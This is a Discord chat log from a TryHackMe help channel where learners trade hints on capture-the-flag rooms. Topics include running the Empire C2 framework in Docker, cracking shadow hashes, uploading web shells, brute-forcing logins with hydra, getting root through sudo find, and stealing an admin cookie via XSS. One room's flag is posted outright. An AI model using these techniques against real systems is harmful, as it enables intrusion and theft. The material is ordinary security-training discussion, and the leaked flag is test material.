hmm, come to think of it, i havent checked the requests it makes when i access the webpage

i will check through that, thx

Gave +1 Rep to @random pond

Can someone help me with the hack the park room https://tryhackme.com/room/hackthepark
Last task (5) How do I use winPEAS to find the original install date? || I was able to find it using systeminfo but not winPEAS ||

could need a hint on: https://tryhackme.com/room/fileinc
task 8, flag2:
setting || cookie to admin || is no problem, but i have problems to interpret:
Warning: include(includes/Admin.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37
in general i have problems with this lfi and rfi topic to draw good conclusions and not only try and error; i understand the basic concept but i dont realy get how to properly enumerate...

EDIT: wow, okay, after a break i got it... didn't knew that cookies can be used in this way... it's all about cookies...

well cookies can decry to get some useful information from them indeed..

i got stuck on crypto 101 task 11

help:

1. gpg import the .key
2. decrypt other file

you will get the flag

And what you stuck with exactly?

Can someone give me hint for Crylo room

I got nothing .

Stuck in Bypassing login page

i was lost in what to do with the .key file. reading the docs the import of the key was not clear to me

luckily someone else posted what they did on here, there is no writeups for the room

Alright, so I guess you are good now?

If I recall, this box is fairly new and hints will not be given in the firt 72hrs.

Thats sad : )

Hello guys, I need some help
I've been stuck on the question

"What do you need to access a web application?"

I tried - web browser, internet connection, URL / link, Authentication Credentials...
doesn't seem to work

thanks in advance 🙂

posting the task would be helpful... in general their are stars in the answer field which show you how long the answer is and sth about the format. e.g. if the answer would be web browser you would see *** *******

I tried to attach a screenshot but Discord doesn't allow me?
it in the Web Application Security module, I will provide a link

https://tryhackme.com/room/introwebapplicationsecurity

I would be very grateful 🙂

You are close, but the word you are looking for only has 7 characters

According to the asterisks in the answer field 🙂

what could possibly be,

The word you are looking for is already in the ones you tried

thanks G, the answer is browser, instead of "web browser" 😩

yes, thanks.

You need to verify to post screenshots

!docs verify

!docs verify

not here brother click on the link..

Does cracking the hash in DailyBugle really take this long?

nvm just cracked it

blowfish is a b*tch to crack holy

For powershell-empire build a Docker container. Like blodhound-python is better running on docker

ohh

and how can I do that

not sure how to deploy a docker or something liek that

i just build one because i can't find other solution "relatively easy"

yeah if possible can you tell me how to do so ':)

mind if I dm regarding this ?

Download the last image
docker pull bcsecurity/empire:latest

Run the SERVER with the rest api and socket ports open
docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire:latest

To run the CLIENT against the already running server container
docker container ls --> Retrieve the id of the container server** {container-id}**
docker exec -it {container-id} ./ps-empire client

https://bc-security.gitbook.io/empire-wiki/quickstart/installation

thank you so much for helping my out let me try it out and see if I can run this 🥲

Gave +1 Rep to @jaunty elbow

It has to work.
Basically with docker you create an isolated environment with all the correct dependencies

ohh

honestly speaking no idea about docker..
i was going through a ctf chal so i heard the name of the docker file first time over there no idea even how can we open it

There is room on THM

Explaning how to build and manage

and exploit of course

ohh can you drop the link for it

https://tryhackme.com/room/introtodockerk8pdqk

https://tryhackme.com/room/dockerrodeo

https://tryhackme.com/room/thegreatescape

thank you again buddy!!

Gave +1 Rep to @jaunty elbow

This first

https://tryhackme.com/room/introtocontainerisation

hello all, I am just getting started with the "starting point" labs and need some hints on a question that should be really easy, but I can't find the answer.
this is for tier1 "appointment" box. task 3. "What is the 2021 OWASP Top 10 Classification for this Vulnerability" referring to the classification name for sql injections. I have been all over the OWASP site for 2021 and I can't find any "classification name" e.g. ********_********n
I don't see anything that fits this pattern ? any hints would be appreciated

If I remember it correctly, isn't this HTB?

can I get a clue?

Room: common attacks
Task 2:
Questions: what was the original target of Stuxnet?

the answer is
*** **** ****** *********

I read the document

my guesses are
|| the iran ? ? || or || usb iran ||
third and fourth word are 6 and 9 characters long, any word i would associate with the answer is either too short or too long

The iran ...

Then name of the program they ran and was targeted

Make sure the spelling of the third one is correct, it's commonly mispronounced!

|| the iran natanz facility || is current guess

More broad

As in Lunar Space Program

ok, got the answer. maybe late day work is not for me

thank @honest wagon

Gave +1 Rep to @honest wagon

I'm so sorry you are correct. I'm working in both environments.

By the way, are you sure it is not --_--*-?

oh yeah that didn't paste well it actually --------_--------n
i'll be sure to post to the correct group next time 🙂 thanks

Gave +1 Rep to @tropic garden

Isn't that the type of injection that lets you run or issue commands directly to the OS?

ah I got it thank you.. that helped and pointed me to the answer I needed, I appreciate it !!

Gave +1 Rep to @tropic garden

Hi guys, I need some help 😩 .
I tried various solutions but it doesn't work, I guess my browser can not load properly.

it is about Operating System Security. I need the answer to the very last question.
I can not attach a screenshot but I will provide a link:
https://tryhackme.com/room/operatingsystemsecurity

Thanks in advance 🙏

Log in as johnny, find the password from the bash history and log in via su - root

I logged in as johnny the first 2 times, now when I tried it says that this user doesnt exist

!docs verify

Verify and provide screenshots please.

the bot doesnt even appear on the chat, idk why

It might still be down

@proud scarab

It's there, lol

su johnny
NOT
su - johnny

Sorry su root

su - root

Works.

No -

As stated in the room.

Yes.

I don't think there is a user
"- root"

I'm Shure there is
root
user

🤷

They've logged in as Johnny already, they need to go to root.

The “su –” command is utilized to switch to the root user account and create a login shell session. It means that it loads the environment of the target user, including the home directory, PATH, and other environment variables.

su – Commands
This command switches the user to the root user account and sets the environment variables to those of the root user.
It also changes the current directory to the root user’s home directory.
This command is often used to execute commands as the root user.
su root Commands
This command switches the user to the root user account without changing the current environment variables or the current directory.
It requires the user to enter the root user’s password to authenticate.
This command is often used to perform administrative tasks as the root user without affecting the current environment.

To switch to another user’s account and start a new shell with their environment, use the “su – <username>” command.

The “su root” command switches to the root user account without creating a login shell. It means that it does not load the root user’s environment. Here is the example of the su root command in

you never stop learning 👍

That wasn't my point.

I know you can do all that.

However they are having an issue with the room, so it's best to provide support on the room with the material.

I didn't know that

Hi, I am doing Overpass 2 - Hacked and I am at the question: 'Using the fasttrack wordlist, how many of the system passwords were crackable?' I have the contents of ||/etc/shadow|| but I am missing the contents of ||/etc/passwd to unshadow and crack||. Crawling through the pcap file I learned that these weren't dumped by the attackers.

So basically I don't get how I would be able to crack the hashes and therefore know how many are crackable. What am I missing?

You don't really need to unshadow to crack the hashes, no?

All unshadow does is combining info from shadow and passwd. You can crack without usernames

The hashes themselves are in shadow only

Yeah, I just cracked it the problem was that hashcat couldn't handle the 5 different types of hashes in that single file.

Ah! Figures

Gg

Thanks for the explanation though, that wasn't clear enough for me obviously. Well now I learned two more things 🙂 Thanks @honest wagon

Gave +1 Rep to @honest wagon

Just when you think you got a little better you make some dumb shit like that 😄

aka learning process

Yup 🙂

Hi there !

I'm currently trying to do the Upload Vulnerabilities - Tutorial room and I would like a hint on how to upload my shell for annex.uploadvulns.thm if this rings a bell to anyone...

'no responses'

would be helpful to tell us on what room you are exactly!

is your question: how to bypass the server-side filtering? bypassing the filter to upload was not so tricky for me, but to get it executed as php... what hint do you need exactly?

In fact I think I've found the way to bypass the server-side filtering. In the previous room we could use the upload button to transfer the shell. In this room I can't see how to do it with the term

if you type help you see 3 commands... type select and hit enter then you can select a file, type upload and hit enter and it will get uploaded

Man seriously... Would you believe I went so far because I didn't get I wasn't supposed to use -select but select

I feel like my stepmother using her computer

But thanks for your answer, I can resume now

hahaha 😅 yeah i know that feeling... that happens

Happens sometimes, my brain goes far too often to "Quantic resolution needed" instead of just trying the easier way. "Uh my screen is KO. Yeah, you should make your linux driver. "Wait...Is the cable ok ?"

hahaha 😄 if want weirder solutions for your upload problem you could try deactivating javascript to get rid of this fake terminal or upload it by inserting it with burp (:

Nah it's ok I'll carry on peacefully

And just to finish me

I always try to do the task without looking at the "hint"

"Commands do not start with a "-". Just use the word itself"

THM{TeslasSpirit0wn3d}

Hi guys, I have been trying to log in as Johnny for a couple of days now but I guess my browser can not load it.

I would really appreciate if someone gave me the asnwer for that room, so I can continue.

I will provide a link:
https://tryhackme.com/room/operatingsystemsecurity

Thanks in advance 🙏

It's asking to you to switch to su - root

Are you entering the password wrong?

no, 1 time I have access and then 50 times - I dont

Are you in root?

it should be that, right>

No, you're root in the attackbox.

ok..?

Wrong machine

In your screenshot, you spelt Johnny wrong.

you used jonny@10.10.210.17

which machine am I supposed to load, I dont get it

Did you press the start machine button?

yes, and there is that

and I just open AttackBox

Then you use the IP that will appear in the box at the top.

https://help.tryhackme.com/en/articles/7977454-how-to-starting-your-first-tryhackme-machine

Have a read over this, it will be clearer.

that doesn't really help, I dont have a problem accessing the machine, it is just that the commands are not working

What's the ip that has populated that field I highlighted?

^ ?

Sorry if you find a newbie like me annoying, but it is frustrating for me.
here is the ip that is shown, what should I do with it

You're not annoying me, don't worry. 🙂

Then you ssh in to it with the johnny.

so it should look sth like ssh johnny@10.10.149.99

?

Yeah

😩

yes

its about the client asks you if you want to trust this server (this key) because you have not connected to it before

it shows different thing every time I try

You forgot the @

I have tried, it gives an error again

ssh johnny@10.10.221.128

take a look : access denied

You've spelled johnny wrong again.

now write - su root?

su - root

authentication fauliure

Are you using the password in the second question?

I used his password ( abc123) to log in, then after every command I have to write it again

but still access denied.. like..?

I want to try to brute force a web login and the form makes a post request to auth/login.php, but with wrong credentials i don't get a feedback other than the site gets reloaded on /index.php... that brings me to the question how to capture that as wrong try with hydra, any idea? or should i use burp (but its to slow...)

if you do sudo - root it will ask you for the root password, not johnnys.

You could try OWASP ZAP?

okay, will have a look at it never heard about (: thx!

https://tryhackme.com/room/learnowaspzap

No.

I've told you the steps to do.

I can show you in a video.

thank you!

Gave +1 Rep to @lucid junco

Infact, I can't because it won't show the password etc

And I need to leave.

@white salmon some times it is a good idea to step it bit back, do sth else, and then when you have some distance to the problem come back, sit down and read from the beginning what is going on their and try to do it... maybe linux fundamentals could be also a good room for you: https://tryhackme.com/room/linuxfundamentalspart1

For burp, don't you only need to identify the request payload (including the page you need to send the request to) once so you can do the brute force via hydra?

as far as i know hydra i need to specify what is returned if the login fails. concerning hydra the question would be how to tell hydra that a site reload means wrong credentials...

@strong lance it probably doesn't get reloaded right away, but sends you a 302 response with Location: header

This can be used to instruct fuzzers and bruteforcers to treat it as a wrong result. As correct login will 99% send you on the other page in a similar way or return 200

@honest wagon hm, interesting, I'll try that later, didn't saw that, thx

Gave +1 Rep to @honest wagon

Try setting failure condition to index.php first

If not working, study the response on bad login in more detail and find something fingerprinty there

Can someone give me a little hint for the Capstone Challenge in the Linux Privilege Escalation Room. I came so far and got the first flag. After switching over to the second user on the system I noticed that there is perl on the machine, or at least a pearl folder under /home/missy and that there ist /home/missy/scripts under the $PATH variable. The scripts directory on it self is missing, I was able to create it. But from here I am a bit stuck, and my research does not bring me really further...
A little push towards the right direction is appreciated, thanks 🙂

don't forget there is a lot of ways to escelate privleges not only suid or cronjobs but also

ok I will try something

Capabilities wont work

and there is no kernel exploit

correct and correct

I did it

one of the tasks in the room talk about this vector... it is obvious if you know how to enumerate that tool

🎉 🎉 🎉

nice

as the first user I was not allowed to use sudo -l that is why I did not tried it with the new one

But then I tried and I figuered that I can use sudo find, and I used that to get my root shell

yuups

good job

Thanks 🙂

can any one give me a hint in The Marketplace room ?

Where are you at the moment in the room ?

trying to steal the admin cookies

try this https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting#retrieve-cookies

lol i was using it and i used web hook to recive the admin cookie but nothing happend it works on me but on the admin dosent work

Maybe wait for some time or restart the room i guess.

i will restart the room and try agin

Make sure cookies are not marked with HttpOnly flag

If they are, you not stealing them

the proplem that i was sending the web hook

and the machine isnot connect to the internt